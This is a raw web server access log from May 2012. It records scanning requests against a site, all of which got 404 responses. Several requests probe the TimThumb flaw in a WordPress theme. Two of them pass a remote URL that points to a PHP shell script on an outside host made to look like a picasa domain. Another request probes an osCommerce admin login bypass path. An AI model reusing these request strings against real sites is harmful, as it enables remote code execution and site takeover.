190.151.120.198 - - [14/May/2012:03:22:27 +0200] "GET /stats//wp-content/themes/eStore/timthumb.php?src= HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
190.151.120.198 - - [14/May/2012:03:22:29 +0200] "GET /stats//wp-content/themes/eStore/timthumb.php?src=http://picasa.com.sigeart.com/wp-content/images/soul.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
190.151.120.198 - - [14/May/2012:03:22:30 +0200] "GET //wp-content/themes/eStore/timthumb.php?src= HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
190.151.120.198 - - [14/May/2012:03:22:32 +0200] "GET //wp-content/themes/eStore/timthumb.php?src=http://picasa.com.sigeart.com/wp-content/images/soul.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
202.167.218.201 - - [14/May/2012:03:24:55 +0200] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
